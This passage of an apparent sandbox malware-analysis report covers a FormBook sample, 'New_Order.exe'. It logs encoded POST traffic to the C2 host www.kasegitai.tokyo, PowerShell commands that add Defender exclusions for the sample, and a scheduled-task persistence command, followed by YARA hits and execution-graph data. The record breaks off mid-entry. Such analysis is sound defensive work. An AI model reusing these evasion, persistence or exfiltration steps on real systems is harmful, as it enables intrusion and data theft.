26 | 192.168.2.4 | 49766 | 202.172.28.202 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:28:23.734517097 CET | 747 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.kasegitai.tokyo
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.kasegitai.tokyo
                                                                                              Referer: http://www.kasegitai.tokyo/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=JSYzEfPQOV52QTF6Z9IUTcq6OG7nHMJ8wYM0teRxbuT1tAPHGdYi02IO+p+0Px09yJoYcH6GKjJN3oUpRJDI24bKttW8lOIb0I9IJtCARiWOoyEAWZ7urqR+LtmyznVCGSjIB6vzN9a4HnGBc/QsnPqXFKfG9oWeOc/kppqoSk5os1mghSLhGoULKTol0MBnkdDolIY=
Dec 3, 2023 16:28:23.993860006 CET | 414 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:28:23 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              27 | 192.168.2.4 | 49767 | 202.172.28.202 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 3, 2023 16:28:26.515870094 CET | 10829 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.kasegitai.tokyo
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.kasegitai.tokyo
                                                                                              Referer: http://www.kasegitai.tokyo/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:28:27.006155968 CET | 414 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:28:26 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              28 | 192.168.2.4 | 49768 | 202.172.28.202 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 3, 2023 16:28:29.296840906 CET | 462 | OUT | GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EQwTHp3RZGFUPSUcH+83d++sEHXiHecksK53+uRoarOYzym5WINU/nAp376IAi0Fnc8MDGSrPwcAz9k7VILN2J3NqNX7kas5xg== HTTP/1.1
                                                                                              Host: www.kasegitai.tokyo
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:28:29.556153059 CET | 414 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:28:29 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>



                                                                                              Target ID:0
                                                                                              Start time:16:25:15
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\Desktop\New_Order.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x6e0000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:16:25:17
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exe"
                                                                                              Imagebase:0x6e0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:16:25:17
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exe"
                                                                                              Imagebase:0x6e0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp"
                                                                                              Imagebase:0x2a0000
                                                                                              File size:187'904 bytes
                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\Desktop\New_Order.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x3b0000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\Desktop\New_Order.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x120000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:10
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\Desktop\New_Order.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x690000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:16:25:18
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x90000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:13
                                                                                              Start time:16:25:22
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe"
                                                                                              Imagebase:0xcd0000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:14
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmp
                                                                                              Imagebase:0x2a0000
                                                                                              File size:187'904 bytes
                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:16
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x40000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:17
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x1c0000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:18
                                                                                              Start time:16:25:23
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              Imagebase:0x890000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:19
                                                                                              Start time:16:25:24
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\wextract.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\wextract.exe
                                                                                              Imagebase:0xeb0000
                                                                                              File size:136'192 bytes
                                                                                              MD5 hash:B9CC7E24DB7DE2E75678761B1D8BAC3E
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:20
                                                                                              Start time:16:25:27
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe"
                                                                                              Imagebase:0xcd0000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              Has exited:false

                                                                                              Target ID:21
                                                                                              Start time:16:25:30
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\wextract.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\wextract.exe
                                                                                              Imagebase:0xeb0000
                                                                                              File size:136'192 bytes
                                                                                              MD5 hash:B9CC7E24DB7DE2E75678761B1D8BAC3E
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Has exited:true

                                                                                              Target ID:23
                                                                                              Start time:16:25:37
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe"
                                                                                              Imagebase:0xcd0000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Has exited:false

                                                                                              Target ID:26
                                                                                              Start time:16:25:49
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                              Imagebase:0x7ff6bf500000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true


                                                                                                Execution Graph

                                                                                                Execution Coverage:10.1%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:121
                                                                                                Total number of Limit Nodes:7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (d^$
                                                                                                • API String ID: 0-321367866
                                                                                                • Opcode ID: ba146503224dfcefd465da550bae47a957efe1823a3ccef1da3aae7f7cb060f2
                                                                                                • Instruction ID: 93495058eef54eca94acae2c9e68664022dcdc8def816a3628d52cf1e36984d6
                                                                                                • Opcode Fuzzy Hash: ba146503224dfcefd465da550bae47a957efe1823a3ccef1da3aae7f7cb060f2
                                                                                                • Instruction Fuzzy Hash: 96B11571E05219DFDB59CFAAD98069EFBB6FF88300F10D52AD415AB264EB309902CF04
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (d^$
                                                                                                • API String ID: 0-321367866
                                                                                                • Opcode ID: 7846f581acc9017444bcfe05cca5a584b22925bfd0ab09273d0734ce639c51b0
                                                                                                • Instruction ID: 11e25bed1bc702e986b1acb50aadb01f54681d81e9ddfc87859a9d4f26cb40cc
                                                                                                • Opcode Fuzzy Hash: 7846f581acc9017444bcfe05cca5a584b22925bfd0ab09273d0734ce639c51b0
                                                                                                • Instruction Fuzzy Hash: 35B11771E05219DFDB58CFAAD98069EFBB6FF88310F10D52AD415AB264EB349902CF04
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c4cc0beafbfd01b6ebc1328f0a8eb9bac6d65dc3e87f4f6c20dd0ddc7d4c1855
                                                                                                • Instruction ID: b6ac52ad5607c70dce920bec0ab3335258c0613bcba1e8c531d0ada304651210
                                                                                                • Opcode Fuzzy Hash: c4cc0beafbfd01b6ebc1328f0a8eb9bac6d65dc3e87f4f6c20dd0ddc7d4c1855
                                                                                                • Instruction Fuzzy Hash: 7251A2B4E051199FCB04DFAAD5809AEFBF2BF88300F24D565E418A7255DB30A942DF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 95f18ef016d754d0169c3282cdbdafe016b86c4125a4edb0f454fc9441a02f3b
                                                                                                • Instruction ID: aaa4b44413de6a1ee54a35a6dc5920d6d11354f250f8ae2242c76a85ba968d3b
                                                                                                • Opcode Fuzzy Hash: 95f18ef016d754d0169c3282cdbdafe016b86c4125a4edb0f454fc9441a02f3b
                                                                                                • Instruction Fuzzy Hash: CB41C3B5E015099FDB08CFAAD58169EFBF2BF88310F18D16AE418A7355DB309942CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00EEB086
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1754868036.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_ee0000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID: DO$DO
                                                                                                • API String ID: 4139908857-1331050724
                                                                                                • Opcode ID: 4a8729ad81104aa27aadcc803c86c107fbc0d7412e754793b387f0e4911bce64
                                                                                                • Instruction ID: e040a9f2c91d5f78af50a20a5bfb9c13d6ba92c303897c5a732c6fd31fefb3b6
                                                                                                • Opcode Fuzzy Hash: 4a8729ad81104aa27aadcc803c86c107fbc0d7412e754793b387f0e4911bce64
                                                                                                • Instruction Fuzzy Hash: 5E7135B0A00B898FD724DF2AD04575ABBF1FF88304F04992DE44AE7A50D775E94ACB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0DF07016
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_df00000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 2bcfebe17d13ae968fe83d754cd66331b03e225874e2f70e42f72ccdb4a08ccc
                                                                                                • Instruction ID: 009eb4ee957a29522cede24d57a8c94abcc78e29e1483e8ec139b5a3d77ef4f2
                                                                                                • Opcode Fuzzy Hash: 2bcfebe17d13ae968fe83d754cd66331b03e225874e2f70e42f72ccdb4a08ccc
                                                                                                • Instruction Fuzzy Hash: 24A16B71D002599FEF24DF68C841BEDBBB2BF48310F1485A9E809E7280DB75A985DF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0DF06B06
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1763609062.000000000DF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DF00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
